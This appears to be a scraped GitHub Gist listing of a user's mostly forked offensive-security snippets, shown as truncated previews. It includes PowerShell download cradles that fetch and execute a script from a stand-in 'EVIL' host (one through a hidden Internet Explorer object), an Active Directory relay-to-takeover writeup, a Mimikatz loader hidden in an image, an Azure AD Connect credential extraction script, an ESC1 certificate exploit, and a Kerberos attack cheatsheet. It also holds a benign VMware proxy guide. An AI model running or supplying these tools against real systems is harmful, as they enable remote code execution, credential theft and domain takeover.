Skip to content

Instantly share code, notes, and snippets.

### Keybase proof
I hereby claim:
* I am d4rkz3ro on github.
* I am sageyev ( on keybase.
* I have a public key ASDnFT5MR4aJjCgaAVnamCtGsr0hwBiHFyUmTWyxqeDaZgo
To claim this, I am signing this object:
D4rkz3rO / DownloadCradles.ps1
Created July 19, 2021 19:10 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
D4rkz3rO /
Created July 26, 2021 02:50 — forked from gladiatx0r/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

D4rkz3rO /
Created September 24, 2021 15:41 — forked from seajaysec/
Parses output from CrackMapExec, CrackMapExtreme, Responder, PCredz, and into aggregate files of hashes and plaintext output
# This script assumes Responder is in /opt/Responder
# Error messages begone!
exec 2>/dev/null
# Hardcoded location for script output files
# Hardcoded location for ntlmrelayx's .sam file output directory
D4rkz3rO / skullkatz.cs
Created September 1, 2021 19:48
SkullKatz - Execute Mimikatz from an image
View skullkatz.cs
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
D4rkz3rO / azuread_decrypt_msol_v2.ps1
Created January 10, 2023 05:41 — forked from xpn/azuread_decrypt_msol_v2.ps1
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
View azuread_decrypt_msol_v2.ps1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
} catch {
Write-Host "[!] Could not connect to localdb..."
View Setup transparent proxy with VMware

Setup transparent proxy with VMware Fusion

  1. Add network (vmnet3) to VMware Fusion
    1. sudo vi /Library/Preferences/VMware\ Fusion/networking
       answer VNET_1_HOSTONLY_SUBNET
       answer VNET_1_VIRTUAL_ADAPTER yes
      +answer VNET_3_DHCP yes
      +answer VNET_3_DHCP_PARAM_DNS_ADDR
D4rkz3rO /
Created February 10, 2023 05:11 — forked from koenrh/
This is a little guide that helps you to "proxify" a VMware Fusion virtual machine on macOS. This can be useful if you want to isolate and analyse web traffic to/from an application by running it in a VM.

Proxifying a VMware Fusion virtual machine on macOS

This is a little guide that helps you to "proxify" a VMware Fusion virtual machine on macOS. This can be useful if you want to isolate and analyse web traffic to/from an application by running it in a VM.


  • VMware Fusion 11 Pro
  • Transparent HTTP/HTTPS proxy (e.g. Burp Suite Pro or mitmproxy)
D4rkz3rO / esc1.ps1
Created February 24, 2023 06:07 — forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
View esc1.ps1
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
D4rkz3rO /
Created April 14, 2023 14:42 — forked from gladiatx0r/
A cheatsheet with commands that can be used to perform kerberos attacks